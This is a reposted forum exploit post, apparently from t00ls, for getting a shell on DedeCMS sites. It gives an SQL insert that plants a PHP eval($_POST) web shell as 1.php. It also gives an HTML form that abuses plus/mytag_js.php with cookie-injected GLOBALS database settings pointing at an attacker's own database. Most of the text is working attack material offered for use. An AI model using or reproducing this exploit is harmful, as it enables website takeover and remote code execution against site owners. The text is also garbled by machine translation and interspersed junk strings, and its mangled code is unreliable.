Dedecms get shell exp

Transferred from: t00ls
Exp, a vulnerability circulating on the internet, indicates that the backend can be used only if the plus directory exists and the server can be connected externally.
_ 1 U-T (B-F8 C
Prerequisites: You must prepare your own Dede database and then insert the data:
Insert into dede_mytag (aid, normbody) values (1, '{Dede: PhP} $ fp = @ fopen ("1.php", \ 'a \'); @ fwrite ($ FP, \ '<? PHP eval ($ _ post [c])?> \ '); Echo "OK"; @ fclose ($ FP); {/Dede: PhP }');
Submit the statement using the following form, and shell will be 1.php in the same directory. The principle of self-study...
-Low-key development 2 ''' y-o! P /?
<Form action = "" method = "Post" name = "quicksearch" id = "quicksearch">
<Input type = "text" value = "http: // localhost: 8080/plus/mytag_js.php? Aid = 1 "name =" doaction "style =" width: 400 "> <br/> t00ls P; A-K8 J1 t'u
<Input type = "text" value = "dbhost" name = "_ cookie [globals] [mongo_dbhost]" style = "width: 400 "> <br/>-low-key development "? (P, H4 '+ O3 y0 y
<Input type = "text" value = "dbuser" name = "_ cookie [globals] [pai_dbuser]" style = "width: 400"> <br/> t00ls 'd. e7 d']) I; | % B % V5 ^ % O
<Input type = "text" value = "dbpwd" name = "_ cookie [globals] [mongo_dbpwd]" style = "width: 400 "> <br/>-low-key development 6 j1' 7 R/h-'# x
<Input type = "text" value = "dbname" name = "_ cookie [globals] [mongo_dbname]" style = "width: 400"> <br/>
<Input type = "text" value = "Dede _" name = "_ cookie [globals] [pai_dbprefix]" style = "width: 400"> <br/> www. t00ls. net0 | 4 w % t ;~ 'H! U9 E P
<Input type = "text" value = "true" name = "nocache" style = "width: 400 "> www.t00ls.net"} 1 H9 H-{+ k s #{2 I)] 8 Z
<Input type = "Submit" value = "Submit" name = "quicksearchbtn"> <br/> www. t00ls. net8 y-} @ # x 'I % O "P5 J5 R0 P
</Form>
<SCRIPT>
Function addaction ()
{$ H3 '0 T5 I6 W
Document. quicksearch. Action = Document. quicksearch. doaction. value;
}
</SCRIPT>